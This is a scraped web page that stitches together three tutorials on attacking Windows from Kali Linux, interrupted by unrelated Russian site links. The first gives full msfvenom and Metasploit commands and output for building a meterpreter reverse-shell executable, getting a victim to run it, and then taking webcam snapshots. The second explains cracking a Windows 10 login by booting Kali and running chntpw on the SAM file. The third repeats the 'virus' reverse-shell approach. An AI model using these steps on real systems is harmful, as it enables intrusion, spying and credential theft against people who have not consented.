Kali linux hacking windows

Quick Guide: How To hack windows with Kali Linux

Kali Linux is derived from Debian Linux flavor and its mainly used for penetration tasting. It has more than 300 pre-installed penetration-testing programs. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits. Let begin with hack windows with Kali Linux.Kindly note that , I am writing this post for education purpose only.

Source machine details:

root@kali:/# uname -a Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux root@kali:/#

Target machine used for hacking:

Step 1. Create Payload

Payload is a program which is similar as a virus or trojan which get executed on the remote machine for hacking purpose. To create payload program use below command which will hack windows with Kali Linux.

root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes Saved as: /root/program.exe root@kali:/# ls -la /root/program.exe -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

With ls command we have confirmed that our Payload program is successfully created at the given location.

Step 2: Run mfsconsole command which will start msf prompt.

root@kali:# msfconsole . . .\$$$$$L. ==aaccaacc%#s$b. d8, d8P d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88' d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 .a#$$$$$$"` 88b d8P 88b`?8888P' ,s$$$$$$$"` 888888P' 88n _. ass;: .a$$$$$$$P` d88P' . ass%#S$$$$$$$$$$$$$$' .a$###$$$P` _. -aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' _______________________________________________________________ ,&$$$$$$'_____ ll&&$$$$' .;;lll&&&&' . ;;lllll&' . ;;;llll;;;. ` . ;;;;. . . Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit =[ metasploit v4.12.22-dev ] + -- --=[ 1577 exploits - 906 auxiliary - 272 post ] + -- --=[ 455 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >

Step 3: For exploiting I have used following details:

  • Port 4444: you can use as per your choice
  • LHOST IP: which is nothing but the Kali Linux machines IP 192.168.189.128. to Know ip of your kali machine use below command.
root@kali:/# ip r l 192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100 root@kali:/#

Now give following command at msf prompt “use exploit/multi/handler”

msf > use exploit/multi/handler msf exploit(handler) >

Then give command “set payload windows/meterpreter/reverse_tcp” at the next prompt:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

Now set local IP and port using LHOST and LPORT command as below:

msf exploit(handler) > set lhost 192.168.189.128 lhost => 192.168.189.128 msf exploit(handler) > set lport 4444 lport => 4444

and finally give exploit command.

msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler.

Now you need to execute the “program.exe” on the windows machine once its executed on target machine , you can able to establish a meterpreter session. Just type sysinfo to get the details hacked windows machine.

msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.189.128:4444 [*] Starting the payload handler. [*] Sending stage (957999 bytes) to 192.168.189.1 [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 meterpreter > sysinfo Computer : MANN-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_IN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32

Once you successfully get this details you can do more exploit or get more information using “help” command which will show all the options by which you can hack the system e.g. to get the webcam snap use command “webcam_snap” same way you can use many available option available. Happy hacking.

Читайте также:  Linux удалить установленный пакет

Источник

How to Crack Windows 10 Password Step by Step

Shubham Goyal 21 December 2020 24 December 2020 Ethical Hacking / Exploiting Tools / Window Hacking

Hey Folks, in this tutorial we will discuss the next method to crack window 10 login password using kali linux operating system. There are many other ways by which you can easily crack the window machine logon password, one of which we have discussed in our previous article. Lets start discussing about this topic without wasting any time.

Prerequisites to crack window 10 password

  • Kali Linux ISO Image – Download here
  • CD/DVD or USB drive with at least 8 GB
  • Rufus Softrware – Donwload here

What is SAM File ?

So when we go to crack the login password of the window machine then we need hashes which is stored within the Windows SAM file at C:\Windows\System32\config location.

Let’s take a look 😛 !!

Make Bootable USB of Kali Linux

Let’s start making bootable USB. Just you need to follow the instructions given below.

  • Step-1 Download the Rufus tool using the given link above.
  • Step-2 Install and boot the software, download the ISO image of kali linux operating system with the link given above.
  • Step-3 After downloading the image file, then click on Select, browse the ISO image and select it.
  • Step-4 Just click on start and complete the process of making bootable USB.

After successfully creating a bootable USB, your USB will look like the image below. Just ignore it.

Go back to the login screen and enter the wrong password 1 to 2 times to create SAM logs into the system.

Читайте также:  Fusion 360 для linux

Ready 😛 !! Just connect the bootable USB to the computer USB port and enter the BIOS setup by pressing the special key (ESC) via the keyboard ( It may be difficult according to the different-2 computers ), select bootable USB and you will get the interface as shown in the given picture. Now click on the first option and proceed ahead.

Done 😛 !! Finally we have entered into the kali linux operating system, so let’s start the process of cracking the password of window 10 machine.

Locate the file manager and open it. After opening it then go to the “other locations” option and select the second directory where SAM is saved. The directory we have selected is the C drive of the window machine where the window is installed.

Hmm 😛 !! After that Right-click on a blank space in File Manager, and select Open Terminal Here. After that we will go to the “/Windows /System32/config/” location one by one using the cd command. Now we have reached the place where the SAM file is kept.

Chntpw Tool to Crack Window 10 Password

Basically we are unable to read the SAM file which is why we will use chntpw tool which will crack the window 10 password itself. You can check all the features of this tool by execute the following command.

Источник

Hack Windows 10 In Kali Linux | windows 10 hacks

Hack Windows 10

First of all, you have to open the terminal in your Kali Linux and then after that, you have to type some commands which you will find in the section of commands. With these commands, you can create a virus, by which you can put all the data on your computer by putting it on any computer or laptop.

Читайте также:  Learning to use linux
Kali Linux – Starting the services and Tool. (windows 10 hack)

Hack Windows 10

Hack Windows 10

You can see that my virus has been created and its size is also mentioned here, after that we will have to start some services for which you will find the commands in the command section.

After starting the services, you have to open a tool which is msfconsole so that you can control your virus and access the data of another laptop. To start the tool, you will find the command in the section of the command.

Kali Linux – Connect the Virus. ( windows 10 hack )

You can see that the msfconsole tool has been opened. Now we have to connect our tool with our virus. For which you have to write some commands first. In the first command, you have to turn on your multi-handler, after that, you will have to set your payload which you gave while creating the virus. After doing all this, you will have to set your kali Linux IP, after that you will have to enter your port which you gave while creating the virus, after all this you have to type Exploit and then press Enter to connect Will be ready for. After all this, the virus that you have created, you have to put in another laptop or computer which you want to hack and then it has to be run by double-clicking. I have inserted my virus inside my windows and also opened it is. You can see that my tool has connected with my virus and a session has been opened and I have a connection to another computer.

Kali Linux – System info. ( windows 10 hack )

You can get information about another computer with the Sysinfo command. After this your computer will be hacked, now you can put anything on the computer and you can also download any file from there.

Источник

Оцените статью
Adblock
detector